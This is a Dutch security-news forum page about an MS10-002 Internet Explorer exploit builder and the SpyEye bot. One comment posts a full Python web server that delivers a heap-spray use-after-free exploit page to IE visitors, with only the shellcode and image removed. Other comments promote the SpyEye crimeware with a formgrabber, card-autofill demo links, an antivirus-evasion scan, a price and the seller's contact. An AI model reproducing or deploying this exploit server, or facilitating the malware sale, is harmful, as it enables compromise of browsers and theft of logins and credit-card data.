Chinese Internet Explorer exploit-bouwdoos
Het via een noodpatch gedichte beveiligingslek in Internet Explorer wordt op dit moment actief tegen internetgebruikers ingezet en het verschijnen van een bouwdoos maakt dat alleen maar eenvoudiger. Het Spaanse anti-virusbedrijf Panda Security maakt melding van een "MS10-002 Exploit Constructor", die op Chinese hackersites werd aangetroffen. De toolkit, gemaakt door de “Dark Techniques Working Group”, genereert een html-bestand dat de exploit bevat. Zodra een slachtoffer het bestand opent, wordt er een opgegeven .exe bestand gedownload en uitgevoerd.
De .exe zou bijvoorbeeld een bot kunnen zijn, zoals de nieuwe SpyEye. Deze bot verscheen begin januari en beschikt over een aantal interessante features. De bot wordt voor 350 euro aangeboden en laat gebruikers ingevoerde formulieren, FTP en POP3 inloggegevens en creditcardgegevens stelen. Daarnaast is de bot onzichtbaar in de processenlijst van Windows. De eerste dagen werd de bot door geen enkel anti-virusbedrijf ontdekt. "Zoals we zien wordt deze industrie steeds groter en complexer, iets dat zeer alarmerend is", zegt malware-onderzoeker Mariano Miguel.
Volgens mij wil jij helemaal niet weten hoe die exploit werkt maar die gewoon misbruiken .....
zo niet ... dan heb je aan de onderstaande informatie meer als de n00b constructor pack (waarschijnlijk is dat pack ook gewoon voorzien van een trojan) en sorry voor het onstaande abracadabra voor de mensen die het niet snappen
import sys
import socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload
def get_payload(self):
payload = REMOVED
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size, payload, nopsled;
chunk_size = 0x80000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data, tmp;
data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj.data = data;
}
event_obj.srcElement;
}
function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}
if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank'
</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
return exploit
def get_image(self):
content = REMOVED
return content
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
try:
if self.path == '/':
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0]
self.wfile.write(self.get_exploit())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path == '/aurora.gif':
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.end_headers()
self.wfile.write(self.get_image())
except:
print '[*] Error : an error has occured while serving the HTTP request'
print '[-] Exiting ...'
sys.exit(-1)
def main():
if len(sys.argv) != 2:
print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
sys.exit(0)
try:
port = int(sys.argv[1])
if port < 1024 or port > 65535:
raise ValueError
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
try:
serv.serve_forever()
except:
print '[-] Exiting ...'
except socket.error:
print '[*] Error : a socket error has occurred'
sys.exit(-1)
except ValueError:
print '[*] Error : an invalid port number was given'
sys.exit(-1)
if __name__ == '__main__':
main()
[/quote]
Volgens mij wil jij helemaal niet weten hoe die exploit werkt maar die gewoon misbruiken .....
zo niet ... dan heb je aan de onderstaande informatie meer als de n00b constructor pack (waarschijnlijk is dat pack ook gewoon voorzien van een trojan) en sorry voor het onstaande abracadabra voor de mensen die het niet snappen
import sys
im..........................:
main()
Is dat toevallig ook C++? Of iets wat daar op lijkt?
Ik probeer al een hele tijd wat leuks te vinden waarmee in HTTP request kan versturen. :)
(ben het aan het leren, t.b.v. mijn CMS waar ik ook een lokaal te installeren versie van wil maken. )
Nee, Python. Maar zal niet werken, de whitespace voor het inspringen is weg, en dat is belangrijk in Python.
Wat video's van SpyEye->
Formgrabber: http://www.sendspace.com/file/p921ln
BillingHammer (CC autofill): http://www.sendspace.com/file/y1yond
Hier de laatste scan, 0/26 dus: http://virtest.com/log.php?dir=59312&id=7da3c839f6e3418e18cd5cf99eb5c8c1
En hij kost 500$, 355.31552 Euros
Mooie aankoop, e-mail me voor de maker zijn ICQ
Wat video's van SpyEye->
Formgrabber: http://www.sendspace.com/file/p921ln
BillingHammer (CC autofill): http://www.sendspace.com/file/y1yond
Hier de laatste scan, 0/26 dus: http://virtest.com/log.php?dir=59312&id=7da3c839f6e3418e18cd5cf99eb5c8c1
En hij kost 500$, 355.31552 Euros
Mooie aankoop, e-mail me voor de maker zijn ICQ
hijs is inderdaad niet compleet goed gezien ;)
Ik ga hier ook niet zo maar een code niet planten die mogelijk misbruikt kan worden, met enige verstand van zaken kun je toe de ontbrekende regels toevoegen ;)
maar op deze manier kun je wel het best inzicht krijgen in de werking van de exploit tevens kunnen programmeurs door dit te begrijpen hun applicaties mogelijk ook beschermen tegen fouten die gemaakt kunnen worden tijdens het programmeren van een applicatie als een browser.
wij hebben geen hackels, hacken is velboden bij de wet.
Deze posting is gelocked. Reageren is niet meer mogelijk.
Specialiseer je in Forensisch ICT
Online informatieavond 19 november
Wil jij je specialiseren in digitaal forensisch onderzoek? Je kennis verbreden en tech-nische vaardigheden ontwikkelen? Ontdek de cursus- en opleidingsmogelijkheden van Hogeschool Leiden:
- Bachelor Informatica Forensisch ICT (deeltijd)
- Master Digital Forensics (vol- en deeltijd)
- Module Mobile Forensics
- Module Data Analytics
Interesse? Meld je aan!
Chief Information Security Officer
Utrecht heeft jou nodig! Als Chief Information Security Officer speel jij een cruciale rol in de bescherming van de digitale informatie van de gemeente Utrecht. Als geen ander weet jij welke dreigingen er zijn en kun je deze vertalen naar risico's die de gemeente en haar inwoners lopen. Solliciteer nu!
Cybersecurity Trainer / Streamer
Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.
